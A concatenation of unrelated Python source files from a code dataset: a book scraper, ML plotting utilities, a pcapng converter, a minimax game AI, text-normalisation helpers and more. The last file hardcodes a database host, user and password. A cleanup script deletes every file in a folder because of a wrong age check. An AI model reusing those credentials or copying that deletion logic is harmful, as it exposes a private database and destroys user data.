OREILLY_FREE_BOOKS_SECTIONS_SIZE:\n\n category = div_book_section.find(\"h3\")\n\n if not div_book_section.has_attr(\"style\"):\n\n sub_book_section = div_book_section.findAll(\"div\", style=\"margin:0 auto;\")\n sub_book_section += div_book_section.findAll(\"div\", style=\"max-width:760px; margin:0 auto;\")\n\n for sub_category in sub_book_section:\n\n sub_category_title = sub_category.find(\"h3\").text\n books = sub_category.findAll(\"a\")\n\n for book in books:\n create_book = Book(book)\n book_json = create_book.book_to_book_json_mapper()\n books_json.append(book_json)\n book_json = []\n\n sub_category_json.append({\"sub_category\": sub_category_title, \"books\": books_json})\n books_json = []\n\n oreilly_json.append({\"category\": category.text, \"sub_categories\": sub_category_json })\n\n else:\n \n books = div_book_section.findAll(\"a\")\n for book in books:\n create_book = Book(book)\n book_json = create_book.book_to_book_json_mapper()\n books_json.append(book_json)\n book_json = []\n\n oreilly_json.append({\"category\": category.text, \"books\": books_json})\n books_json = []\n\n self.response.write(simplejson.dumps(oreilly_json))\n self.response.headers['Content-Type'] = 'application/json'\n\nclass Book(object):\n\n def __init__(self, book):\n self.book = book\n\n def book_to_book_json_mapper(self):\n\n book_json = {}\n book_json['title'] = self.book.find('img')['alt']\n book_json['description'] = self.book.get('data-content')\n book_json['thumbnail'] = self.book.find('img')['src']\n href = self.book.get('href')\n book_json['href'] = href\n download_json = Download(href).href_to_download_json_mapper()\n if download_json:\n book_json['download'] = download_json\n\n return book_json\n\n\n\nclass Download(object):\n\n def __init__(self, href):\n self.href = href\n\n def href_to_download_json_mapper(self):\n HREF_START = \"http://www.oreilly.com/programming/free/\"\n HREF_END = \".csp\"\n OREILLY_BUCKET_PROGRAMMING = \"http://www.oreilly.com/programming/free/files/\"\n EXTENSION_EPUB = \".epub\"\n EXTENSION_MOBI = \".mobi\"\n EXTENSION_PDF = \".pdf\"\n books_download_json = []\n\n if HREF_START in self.href:\n book_href_title = (self.href.split(HREF_START))[1].split(HREF_END)[0]\n book_epub = OREILLY_BUCKET_PROGRAMMING + book_href_title + EXTENSION_EPUB\n book_mobi = OREILLY_BUCKET_PROGRAMMING + book_href_title + EXTENSION_MOBI\n book_pdf = OREILLY_BUCKET_PROGRAMMING + book_href_title + EXTENSION_PDF\n books_download_json.append({\"epub\": book_epub, \"mobi\": book_mobi , \"pdf\": book_pdf })\n\n\n return books_download_json\n\n\napp = webapp2.WSGIApplication([\n ('/oreilly-free', MainHandler)\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"350016907","text":"import cv2\nimport numpy as np\nimport glob\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom operator import itemgetter\nimport matplotlib\nfrom keras.utils import to_categorical\nfrom sklearn.metrics import confusion_matrix\n\nlabel_type = ['Kitchen', 'Store', 'Bedroom', 'LivingRoom', 'Office',\n 'Industrial', 'Suburb', 'InsideCity', 'TallBuilding', 'Street',\n 'Highway', 'OpenCountry', 'Coast', 'Mountain', 'Forest']\n\ndef get_data(gray=True,size=None, normal=False):\n\n train_x = []\n test_x = []\n\n train_y = []\n test_y = []\n\n size = size\n\n for index, label in enumerate(label_type):\n training_imgs = glob.glob('hw5_data/train/{}/*.jpg'.format(label))\n testing_imgs = glob.glob('hw5_data/test/{}/*.jpg'.format(label))\n for fname in training_imgs:\n train_y.append(index)\n img = cv2.imread(fname)\n if gray:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if size!=None:\n \t img = cv2.resize(img, (size,size)).reshape((size,size,1))/255.0\n elif size!=None:\n img = cv2.resize(img, (size,size)).reshape((size,size,3))/255.0\n if normal:\n img = cv2.normalize(img, img, 0, 255, cv2.NORM_MINMAX)\n train_x.append(img)\n \n for fname in testing_imgs:\n test_y.append(index)\n img = cv2.imread(fname)\n if gray:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if size!=None:\n img = cv2.resize(img, (size,size)).reshape((size,size,1))/255.0\n elif size!=None:\n img = cv2.resize(img, (size,size)).reshape((size,size,3))/255.0\n if normal:\n img = cv2.normalize(img, img, 0, 255, cv2.NORM_MINMAX)\n test_x.append(img)\n if size!=None:\n train_x = np.array(train_x).astype(np.float32)\n test_x = np.array(test_x).astype(np.float32)\n train_y = np.array(train_y).astype(np.float32)\n test_y = np.array(test_y).astype(np.float32)\n \n return(train_x,train_y,test_x,test_y)\n\ndef plot_heatmap(true_y, pred_y, save_dir):\n true_y = [label_type[x] for x in true_y]\n pred_y = [label_type[x] for x in pred_y]\n sns.heatmap(confusion_matrix(true_y, pred_y, labels=label_type, normalize='true'),xticklabels=label_type,yticklabels=label_type)\n plt.tight_layout()\n plt.savefig(save_dir)\n\ndef plot_res(true_y, pred_y, save_dir='res'):\n \n def unique_by_key(elements, key=None):\n if key is None:\n # no key: the whole element must be unique\n key = lambda e: e\n return list({key(el): el for el in elements}.values())\n\n true_y = [label_type[x] for x in true_y]\n pred_y = [label_type[x] for x in pred_y]\n\n train = []\n test = []\n\n train_dict = {}\n test_dict = {}\n\n for index, label in enumerate(label_type):\n training_imgs = glob.glob('hw5_data/train/{}/*.jpg'.format(label))\n testing_imgs = glob.glob('hw5_data/test/{}/*.jpg'.format(label))\n for fname in training_imgs:\n img = cv2.imread(fname)\n train.append(img)\n if label not in train_dict:\n train_dict[label] = img\n\n for fname in testing_imgs:\n img = cv2.imread(fname)\n test.append(img)\n if label not in test_dict:\n test_dict[label] = img\n \n false_negative = {k:[] for k in label_type}\n false_positive = {k:[] for k in label_type}\n true_positive = {k:[] for k in label_type} \n \n for idx in range(len(true_y)):\n if true_y[idx] != pred_y[idx]:\n false_negative[true_y[idx]].append((idx,pred_y[idx]))\n false_positive[pred_y[idx]].append((idx,true_y[idx])) \n else:\n true_positive[true_y[idx]].append(idx)\n \n for cat in false_negative:\n false_negative[cat]=unique_by_key(false_negative[cat], key=itemgetter(1))\n\n for cat in false_positive:\n false_negative[cat]=unique_by_key(false_negative[cat], key=itemgetter(1))\n \n fig, axes = plt.subplots(nrows=16, ncols=5, figsize=(12, 30))\n\n axes[0][0].axis('off')\n \n for idx, cat in enumerate(label_type):\n \n axes[idx+1][1].axis('off')\n axes[idx+1][1].imshow(train_dict[cat])\n \n axes[idx+1][2].axis('off')\n if len(true_positive[cat])!=0:\n axes[idx+1][2].imshow(test[true_positive[cat][0]])\n \n axes[idx+1][3].axis('off')\n if len(false_positive[cat])!=0:\n axes[idx+1][3].set_title(false_positive[cat][0][1])\n axes[idx+1][3].imshow(test[false_positive[cat][0][0]])\n \n axes[idx+1][4].axis('off')\n axes[idx+1][4].patch.set_facecolor('xkcd:mint green')\n if len(false_negative[cat])!=0:\n axes[idx+1][4].set_title(false_negative[cat][0][1])\n axes[idx+1][4].imshow(test[false_negative[cat][0][0]])\n \n for ax, row in zip(axes[1:,0], label_type):\n ax.axis('off')\n ax.set_title(row, rotation=0, size='large',fontweight='bold',loc='right')\n \n for ax, col in zip(axes[0][1:], [\"Sample training images\",\"Sample true positives\",\"False positives with \\ntrue label\",'False negatives with \\nwrong predicted label']):\n ax.axis('off')\n ax.set_title(col, rotation=0, size='large',fontweight='bold',y=-0.01)\n \n fig.tight_layout()\n plt.savefig(save_dir)\n plt.show()\n","sub_path":"Lab5/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"249978907","text":"#!/usr/bin/env python3\n#\n# Copyright 2019 The usbmon-tools Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# SPDX-FileCopyrightText: © 2019 The usbmon-tools Authors\n# SPDX-License-Identifier: Apache-2.0\n\"\"\"Extract the packets from a pcapng capture in base64 format.\"\"\"\n\nimport argparse\nimport binascii\nimport sys\n\nimport pcapng\n\n\ndef main():\n if sys.version_info < (3, 7):\n raise Exception(\"Unsupported Python version, please use at least Python 3.7.\")\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"pcap_file\",\n action=\"store\",\n type=str,\n help=\"Path to the pcapng file with the USB capture.\",\n )\n\n args = parser.parse_args()\n\n with open(args.pcap_file, \"rb\") as pcap_file:\n scanner = pcapng.FileScanner(pcap_file)\n for block in scanner:\n if isinstance(block, pcapng.blocks.InterfaceDescription):\n if (\n block.link_type\n != pcapng.constants.link_types.LINKTYPE_USB_LINUX_MMAPPED\n ):\n raise Exception(\n f\"In file {args.pcap_file}: expected USB capture, \"\n f\"found {block.link_type_description}.\"\n )\n elif isinstance(block, pcapng.blocks.EnhancedPacket):\n assert block.interface_id == 0\n _, _, payload = block.packet_payload_info\n print(binascii.b2a_base64(payload, newline=False).decode(\"ascii\"))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"usbmon/tools/pcapng2base64.py","file_name":"pcapng2base64.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559318944","text":"from game_controls import winner\nfrom game_controls import update_board\nimport copy\nimport math\n\n\ndef invert(val):\n if val == 'O':\n return 'X'\n elif val == 'X':\n return 'O'\n\n\ndef get_available_moves(board):\n moves = []\n for i in range(0, 3):\n for j in range(0, 3):\n if board[i][j] is None:\n moves.append((j, i))\n return moves\n\n\ndef minimax_score(player, board, alpha, beta):\n available_moves = get_available_moves(board)\n if winner('X', board):\n return math.inf\n elif winner('O', board):\n return -math.inf\n elif not available_moves:\n return 0\n if player == 'X':\n best_score = -math.inf\n for move in available_moves:\n sample_board = copy.deepcopy(board)\n update_board(player, move, sample_board)\n score = minimax_score('O', sample_board, alpha, beta)\n best_score = max(best_score, score)\n alpha = max(alpha, best_score)\n if beta <= alpha:\n break\n return best_score\n else:\n best_score = math.inf\n for move in available_moves:\n sample_board = copy.deepcopy(board)\n update_board(player, move, sample_board)\n score = minimax_score('X', sample_board, alpha, beta)\n best_score = min(best_score, score)\n beta = min(beta, best_score)\n if beta <= alpha:\n break\n return best_score\n\n\ndef tra_ai_move(board):\n move_to_make = None\n max_score = None\n moves = get_available_moves(board)\n for move in moves:\n sample_board = copy.deepcopy(board)\n update_board('X', move, sample_board)\n score = minimax_score('O', sample_board, -math.inf, math.inf)\n if max_score is None or score > max_score:\n max_score = score\n move_to_make = move\n return move_to_make\n","sub_path":"src/trained_AI.py","file_name":"trained_AI.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509089451","text":"#!/usr/bin/env python3\n# author:Alnk(李成果)\n\n\nclass School(object):\n '''学校类'''\n\n def __init__(self, name, addr):\n self.name = name\n self.addr = addr\n self.students = []\n self.staffs = []\n\n def enroll(self, stu_obj):\n '''注册'''\n print('为学员%s 办理注册手续' % stu_obj.name)\n self.students.append(stu_obj)\n\n def hire(self, staff_obj):\n '''雇佣'''\n self.staffs.append(staff_obj)\n print('雇佣新员工%s' % staff_obj.name)\n\n\nclass SchoolMember(object):\n '''老师和学生类'''\n\n def __init__(self, name, age, sex):\n self.name = name\n self.age = age\n self.sex = sex\n\n def tell(self):\n '''打印自己的个人信息'''\n pass\n\n\nclass Teacher(SchoolMember):\n '''教师类'''\n\n def __init__(self, name, age, sex, salary, course):\n super(Teacher, self).__init__(name, age, sex)\n self.salary = salary\n self.course = course\n\n def tell(self):\n print('''\n --- info of Teacher: %s ---\n name:%s\n age:%s\n sex:%s\n salary:%s\n course:%s\n ''' % (self.name, self.name, self.age, self.sex, self.salary, self.course))\n\n def teach(self):\n print('%s is teaching course [%s]' % (self.name, self.course))\n\n\nclass Student(SchoolMember):\n '''学生类'''\n\n def __init__(self, name, age, sex, stu_id, grade):\n super(Student, self).__init__(name, age, sex)\n self.stu_id = stu_id\n self.grade = grade\n\n def tell(self):\n print('''\n --- info of Student: %s ---\n name:%s\n age:%s\n sex:%s\n stu_id:%s\n grade:%s\n ''' % (self.name, self.name, self.age, self.sex, self.stu_id, self.grade))\n\n def pay_tuition(self, amount):\n '''交学费'''\n print('%s has paid tuition for $[%s]' % (self.name, amount))\n\n\nschool = School(\"老男孩IT\", '沙河') # 实例化一所学校\n\nt1 = Teacher('oldboy', 56, 'mf', 20000000, 'linux') # 实例化一个老师\nt2 = Teacher('alex', 32, 'm', 3000, 'pythondevops') # 实例化一个老师\n\ns1 = Student('tom', 22, 'mf', 1001, 'pythondevops') # 实例化一个学生\ns2 = Student('xu', 19, 'mf', 1002, 'linux') # 实例化一个学生\n\nt1.tell() # 调用Teacher类tell方法\ns1.tell() # 调用Student类tell方法\n\nschool.hire(t1) # 调用School类hire方法,雇佣oldboy\nschool.enroll(s1)\nschool.enroll(s2)\n\nprint(school.staffs) # 查看雇佣了多少老师,这是一个内存地址\nprint(school.students) # 查看注册了多少学生,这是一个内存地址\nprint('被雇佣的老师名称:', school.staffs[0].name)\nprint('注册学生的名称:', school.students[0].name, school.students[1].name)\n\nschool.staffs[0].teach() # 让老师开始上课 school.staffs[0] = t1 因为school.hire(t1)中append到了self.students = []\nt1.teach()\n\nfor stu in school.students: # school.students = [s1,s2]\n stu.pay_tuition(5000)\nprint(type(school.students))\n","sub_path":"day06/01笔记/07继承示例-学校.py","file_name":"07继承示例-学校.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"40514615","text":"\"\"\"\n主要是全角转半角\n繁体转简体\n后续 需要截断 大写改小写\n\n\"\"\"\n\n\nfrom langconv import *\n\ndef is_chinese(uchar):\n \"\"\"判断一个unicode是否是汉字\"\"\"\n if uchar >= u'\\u4e00' and uchar<=u'\\u9fa5':\n return True\n else:\n return False\n\ndef is_number(uchar):\n \"\"\"判断一个unicode是否是半角数字\"\"\"\n if uchar >= u'\\u0030' and uchar <= u'\\u0039':\n return True\n else:\n return False\ndef is_alphabet(uchar):\n \"\"\"判断一个unicode是否是半角英文字母\"\"\"\n if (uchar >= u'\\u0041' and uchar <= u'\\u005a') or (uchar >= u'\\u0061' and uchar <= u'\\u007a'):\n return True\n else:\n return False\n\ndef is_Qalphabet(uchar):\n \"\"\"判断一个unicode是否是全角英文字母\"\"\"\n if (uchar >= u'\\uff21' and uchar <= u'\\uff3a') or (uchar >= u'\\uff41' and uchar <= u'\\uff5a'):\n return True\n else:\n return False\n\ndef is_Qnumber(uchar):\n \"\"\"判断一个unicode是否是全角数字\"\"\"\n if uchar >= u'\\uff10' and uchar <= u'\\uff19':\n return True\n else:\n return False\ndef B2Q(uchar):\n \"\"\"单个字符 半角转全角\"\"\"\n inside_code = ord(uchar)\n if inside_code < 0x0020 or inside_code > 0x7e: # 不是半角字符就返回原来的字符\n return uchar\n if inside_code == 0x0020: # 除了空格其他的全角半角的公式为: 半角 = 全角 - 0xfee0\n inside_code = 0x3000\n else:\n inside_code += 0xfee0\n return chr(inside_code)\n\n\ndef Q2B(uchar):\n \"\"\"单个字符 全角转半角\"\"\"\n inside_code = ord(uchar)\n if inside_code == 0x3000:\n inside_code = 0x0020\n else:\n inside_code -= 0xfee0\n if inside_code < 0x0020 or inside_code > 0x7e: #转完之后不是半角字符返回原来的字符\n return uchar\n return chr(inside_code)\n\ndef stringQ2B(ustring):\n \"\"\"把字符串全角转半角\"\"\"\n return \"\".join([Q2B(uchar) for uchar in ustring])\n\ndef stringpartQ2B(ustring):\n \"\"\"把字符串中数字和字母全角转半角\"\"\"\n return \"\".join([Q2B(uchar) if is_Qnumber(uchar) or is_Qalphabet(uchar) else uchar for uchar in ustring])\ndef is_other(uchar):\n \"\"\"判断是否非汉字,数字和英文字符\"\"\"\n if not (is_chinese(uchar) or is_number(uchar) or is_alphabet(uchar)):\n return True\n else:\n return False\n\ndef Traditional2Simplified(sentence):\n '''\n 将sentence中的繁体字转为简体字\n :param sentence: 待转换的句子\n :return: 将句子中繁体字转换为简体字之后的句子\n '''\n sentence = Converter('zh-hans').convert(sentence)\n return sentence\n\n\n\n\nif __name__ == '__main__':\n text = \"电影《2012》讲述了2012年12月21日的世界末日,主人公Jack以及世界各国人民挣扎求生的经历,灾难面前,尽现人间百态。\"\n\n print(\"text原文:\", text, sep=\"\\n\", end=\"\\n\")\n text1 = stringQ2B(text)\n print(\"全角转半角:\", text1, sep=\"\\n\", end=\"\\n\")\n text2 = stringpartQ2B(text)\n print(\"数字字母全角转半角:\", text2, sep=\"\\n\", end=\"\\n\")\n\n traditional_sentence = '憂郁的臺灣烏龜'\n simplified_sentence = Traditional2Simplified(traditional_sentence)\n print(simplified_sentence)\n","sub_path":"preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"359804602","text":"\"\"\"\nCopyright (c) 2016 Jet Propulsion Laboratory,\nCalifornia Institute of Technology. All rights reserved\n\"\"\"\n# distutils: include_dirs = /usr/local/lib/python2.7/site-packages/cassandra\nimport pyximport\n\npyximport.install()\n\nfrom webservice.NexusHandler import NexusHandler, nexus_handler, DEFAULT_PARAMETERS_SPEC\nfrom webservice.webmodel import NexusResults\n\n\n@nexus_handler\nclass DataInBoundsSearchHandlerImpl(NexusHandler):\n name = \"Data In-Bounds Search\"\n path = \"/datainbounds\"\n description = \"Fetches point values for a given dataset and geographical area\"\n params = DEFAULT_PARAMETERS_SPEC\n singleton = True\n\n def __init__(self):\n NexusHandler.__init__(self)\n\n def calc(self, compute_options, **args):\n min_lat = compute_options.get_min_lat()\n max_lat = compute_options.get_max_lat()\n min_lon = compute_options.get_min_lon()\n max_lon = compute_options.get_max_lon()\n ds = compute_options.get_dataset()[0]\n start_time = compute_options.get_start_time()\n end_time = compute_options.get_end_time()\n includemeta = compute_options.get_include_meta()\n\n tiles = self._tile_service.get_tiles_bounded_by_box(min_lat, max_lat, min_lon, max_lon, ds, start_time,\n end_time)\n\n data = []\n for tile in tiles:\n for nexus_point in tile.nexus_point_generator():\n data.append({\n 'latitude': nexus_point.latitude,\n 'longitude': nexus_point.longitude,\n 'time': nexus_point.time,\n 'data': [\n {\n 'id': tile.tile_id,\n 'value': nexus_point.data_val\n }\n ]\n })\n\n if includemeta and len(tiles) > 0:\n meta = [tile.get_summary() for tile in tiles]\n else:\n meta = None\n\n result = NexusResults(\n results=data,\n stats={},\n meta=meta)\n\n result.extendMeta(min_lat, max_lat, min_lon, max_lon, \"\", start_time, end_time)\n\n return result\n","sub_path":"analysis/webservice/algorithms/DataInBoundsSearch.py","file_name":"DataInBoundsSearch.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"413925481","text":"import os\r\nimport shutil\r\nimport time\r\n\r\npath = input(\"Enter the path of folder to delete: \")\r\ndays = 30\r\nseconds = time.time() - (days * 24 * 60 * 60)\r\npath = path + \"/\"\r\n\r\nlist_of_files = os.listdir(path)\r\n\r\ndef file_time(path):\r\n\tctime = os.stat(path).st_ctime\r\n\treturn ctime\r\n\r\n\r\nif os.path.exists(path):\r\n for file in list_of_files:\r\n if seconds >= file_time(path):\r\n os.remove(path + file)\r\n print(\"Files deleted successfully!\")\r\n\r\n else:\r\n print(\"File exists less than 30 days. Enter a file path that exists more than 30 days.\")\r\nelse:\r\n print(\"Entered path does not exist\")","sub_path":"removing files-99/Removefiles.py","file_name":"Removefiles.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"109408578","text":"# -*- coding: utf-8 -*-\n\n#=========================================================\n# Clase: BagOfWords\n#\n# Autor: Antonio Paya Gonzalez\n#\n#=========================================================\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\n\nimport nltk\n#nltk.download('punkt')\n#nltk.download('wordnet')\n#nltk.download('stopwords')\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\nclass BagOfWords(object):\n def __init__(self, text=None, values=None, enable_stemming=True, filter_stopwords=True):\n \"\"\"Constructor\n\n Si recibe un string mediante el argumento text lo convierte a un\n diccionario. Si recibe un diccionario simplemente lo copia para su\n uso interno.\n \"\"\"\n self.enable_stemming = enable_stemming\n self.filter_stopwords = filter_stopwords\n self.text = text\n if values is not None:\n self.values = values\n elif type(text) is dict:\n self.values = text\n elif type(text) is str or type(text) is unicode:\n self.values = self.string_to_bag_of_words(text,{})\n elif type(text) is list:\n bag = {}\n for i in text:\n bag = self.string_to_bag_of_words(text, bag)\n self.values = bag\n else:\n self.values = {}\n\n\n def __str__(self):\n \"\"\"Devuelve un string con la representacion del objeto\n\n El objeto BagOfWords(“A b a”) está representado por el string\n \"{‘a’: 2, ‘b’: 1}\"\n \"\"\"\n return str(self.values)\n\n def __len__(self):\n \"\"\"Devuelve el tamaño del diccionario\"\"\"\n return len(self.values)\n\n def __iter__(self):\n \"\"\"Crea un iterador que devuelve la clave y el valor de cada\n elemento del diccionario\n\n El diccionario {‘a’: 1, ‘b’: 2} devuelve:\n - (‘a’, 1) en la primera llamada\n - (‘b’, 2) en la primera llamada\n \"\"\"\n for x in self.values.iteritems():\n yield x\n\n def intersection(self, other):\n \"\"\"Intersecta 2 bag-of-words\n\n La intersección de “a b c a” con “a b d” es:\n {‘a’: 1, ‘b’: 1}\n \"\"\"\n keys_a = set(self.values)\n keys_b = set(other.values)\n intersection = {}\n for word in keys_a & keys_b:\n intersection[word] = min(self.values[word],other.values[word])\n return BagOfWords(values=intersection)\n\n def union(self, other):\n \"\"\"Une 2 bag-of-words\n\n La unión de “a b c a” con “a b d” es:\n {‘a’: 3, ‘b’: 2, ‘c’: 1, ‘d’: 1}\n \"\"\"\n keys_a = set(self.values)\n keys_b = set(other.values)\n union = {}\n for word in keys_a | keys_b:\n val1 = self.values[word] if word in self.values else 0\n val2 = other.values[word] if word in other.values else 0\n union[word] = val1 + val2\n return BagOfWords(values=union)\n\n def document_len(self):\n return reduce((lambda x,value: x + value),self.values.itervalues(),0)\n\n def string_to_bag_of_words(self,text,bag):\n \"\"\"Convierte un string a bag of words\"\"\"\n lemmatizer = WordNetLemmatizer()\n words = word_tokenize(text)\n #words = [unicode(x, errors='replace') for x in words]\n stop = set(stopwords.words('english')) if self.filter_stopwords else []\n signosPuntuacion = [\"?\", \"¿\", \"¡\", \"!\", \" \", \",\", \".\", \";\", \":\"]\n # Eliminar símbolos de puntuación y palabras vacias\n tokens = list(filter(lambda x: x not in signosPuntuacion and x not in stop, words))\n\n for word in tokens:\n word = word.lower() # Pasar a minusculas\n if self.enable_stemming:\n word = lemmatizer.lemmatize(word) # Lematizar mediante NLTK\n if word in bag: # Almacenar palabra con el numero de apariciones de la misma\n bag[word] = 1 + bag[word]\n else:\n bag[word] = 1\n\n return bag\n","sub_path":"Indexador/bag_of_words.py","file_name":"bag_of_words.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415269371","text":"# -*- coding: utf-8 -*-\n\n### Import libraries\nfrom fuzzywuzzy import fuzz\nimport numpy as np\nimport os\nimport pandas as pd\nimport pickle\nimport re\nimport sys\n\n# !pip install -q fuzzywuzzy\n# !pip install -q fuzzywuzzy[speedup]\n\n\ndef load_mile_road_dict():\n mile_road_dict = {'1': 'One',\n '2': 'Two',\n '3': 'Three',\n '4': 'Four',\n '5': 'Five',\n '6': 'Six',\n '7': 'Seven',\n '8': 'Eight',\n '9': 'Nine',\n '10': 'Ten',\n '11': 'Eleven',\n '12': 'Twelve',\n '13': 'Thirteen',\n '14': 'Fourteen',\n '15': 'Fifteen',\n '16': 'Sixteen',\n '17': 'Seventeen',\n '18': 'Eighteen',\n '19': 'Nineteen',\n '20': 'Twenty'}\n return mile_road_dict\n\n\ndef save_resource(data, file_name,\n file_path=\"resources\"):\n \"\"\" Save resource to directory\n Args:\n data: the data to be stored.\n file_name (str): save data to file_name.\n file_path (str): directory to save data. Default is ```resources```\n Returns:\n None\n \"\"\"\n # Check path exists\n current_dir, _ = os.path.split(__file__)\n data_path = os.path.join(current_dir+\"/../\", file_path)\n assert (os.path.exists(data_path)), \\\n \"Directory {} does not exist! \".format(data_path)\n\n ### Save data\n with open(os.path.join(data_path,file_name), 'wb') as handle:\n pickle.dump(data, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef load_resource(file_name, rel_path=\"resources\"):\n \"\"\" Load resource\n Args:\n file_name (str): full file name. This should be included in\n ```resources``` directory.\n rel_path (str): path to ```file_name```. Default value\n is ```resources```.\n\n Returns:\n data: the data consistant with pickle file data.\n \"\"\"\n # Get directory\n current_dir, _ = os.path.split(__file__)\n data_path = os.path.join(current_dir+\"/../\", rel_path, file_name)\n\n # Read resource file\n assert (os.path.exists(data_path)), \\\n \"Resource {} does not exist! \".format(data_path)\n\n with open(data_path, 'rb') as handle:\n data = pickle.load(handle)\n\n return data\n\ndef compile_re(pattern):\n \"\"\" Compile a regular expression with pattern\n Args:\n pattern (str): a string representing the pattern\n e.g. \"NoviPRD-.*\" means strings that start with \"NoviPRD-\"\n e.g. \".*\\.csv\" means strings that end with \".csv\"\n e.g. \".*xxx.*\" means strings that contain \"xxx\" in the middle\n\n Returns:\n regular expression object\n \"\"\"\n return re.compile(pattern)\n\n\ndef find_within(path, pattern, name_only=True):\n \"\"\" Find fileds in path with pattern\n Args:\n path (str): path to data\n pattern (str): a string representing the pattern\n e.g. \"NoviPRD-.*\" means strings that start with \"NoviPRD-\"\n e.g. \".*\\.csv\" means strings that end with \".csv\"\n e.g. \".*xxx.*\" means strings that contain \"xxx\" in the middle\n Returns:\n an iterable of files in path whose name matches with pattern\n \"\"\"\n\n assert(os.path.exists(path)), \"Path {} does not exist!\".format(path)\n regex = compile_re(pattern)\n\n for file in os.listdir(path):\n file_name = os.fsdecode(file)\n if regex.search(file_name):\n if name_only:\n yield file_name\n else:\n yield file\n\n\ndef load_df(file_name, path=\"resources\", **kwargs):\n \"\"\" Load resource\n Args:\n file_name (str): full file name. This should be included in\n ```resources``` directory.\n path (str): path to ```file_name```. Default value\n is ```resources```.\n **kwargs: kwargs to be passeed into pd.read_csv\n Returns:\n data: the data from the csv file\n \"\"\"\n # Get directory\n if os.path.exists(path):\n # this is an absolute path\n data_path = os.path.join(path, file_name)\n else:\n # this is a relative path\n current_dir, _ = os.path.split(__file__)\n data_path = os.path.join(current_dir+\"/../\", path, file_name)\n\n # Read resource file\n assert (os.path.exists(data_path)), \\\n \"Resource {} does not exist! \".format(data_path)\n if file_name.endswith('.csv'):\n df = pd.read_csv(data_path, **kwargs)\n else:\n df = pd.read_excel(data_path, **kwargs)\n\n return df\n\n\ndef load_sample(file_name=\"addresses.csv\",\n rel_path=\"resources/datasets\"):\n \"\"\" Load resource\n Args:\n file_name (str): full file name. This should be included in\n ```resources``` directory.\n rel_path (str): path to ```file_name```. Default value\n is ```resources```.\n\n Returns:\n data: the data consistant with pickle file data.\n \"\"\"\n # Get directory\n current_dir, _ = os.path.split(__file__)\n data_path = os.path.join(current_dir+\"/../\", rel_path, file_name)\n\n # Read resource file\n assert (os.path.exists(data_path)), \\\n \"Resource {} does not exist! \".format(data_path)\n\n\n sample = pd.read_csv(data_path)\n return sample\n","sub_path":"address_parser/resource_manager.py","file_name":"resource_manager.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"142338912","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\nimport re\nimport requests\n\n\ndef connect():\n \"\"\" db connection for psql\n\n :return: (object) psycopg2 connect\n \"\"\"\n\n conn = psycopg2.connect(\n database='dbk51u9o6si8cf',\n user='kzcphlvaszckxl',\n password='sFkISkzjGO3I3ZqiSy001Q0L9g',\n host='ec2-107-21-219-201.compute-1.amazonaws.com',\n port='5432'\n )\n return conn\n\n\ndef get_trialid():\n \"\"\" fetches highest trial id number\n\n :return: (int) trial id\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n cur.execute('''SELECT trialid FROM snapshot ORDER BY trialid DESC LIMIT 1''')\n trialid = cur.fetchone()\n if trialid:\n trialid = trialid[0]\n else:\n trialid = 1\n conn.close()\n\n return trialid\n\n\ndef update_table(row, trialid, giantbomb):\n \"\"\" checking and updating db with game info from giantbomb\n\n\n :param row: (dict) dict of twitch json object\n :param trialid: (int) trial id number\n :param giantbomb: (object) giantbomb class object\n :return: None\n :rtype: object\n\n \"\"\"\n\n giantbomb.check_db(row['name'], row['giantbombid'])\n row['trialid'] = trialid + 1\n\n conn = connect()\n cur = conn.cursor()\n\n # adding values into snapshot table\n query = '''\n INSERT INTO snapshot VALUES (\n DEFAULT,\n %(name)s,\n %(giantbombid)s,\n %(trialid)s,\n %(rank)s,\n %(viewers)s,\n %(channels)s,\n current_timestamp\n )\n '''\n cur.execute(query, row)\n\n # updating game_name table: if no entry found add entry\n query = '''\n DO\n $do$\n BEGIN\n IF EXISTS(SELECT * FROM game_name WHERE name = %(name)s) THEN\n UPDATE game_name\n SET viewer_total = viewer_total + %(viewers)s,\n channel_total = channel_total + 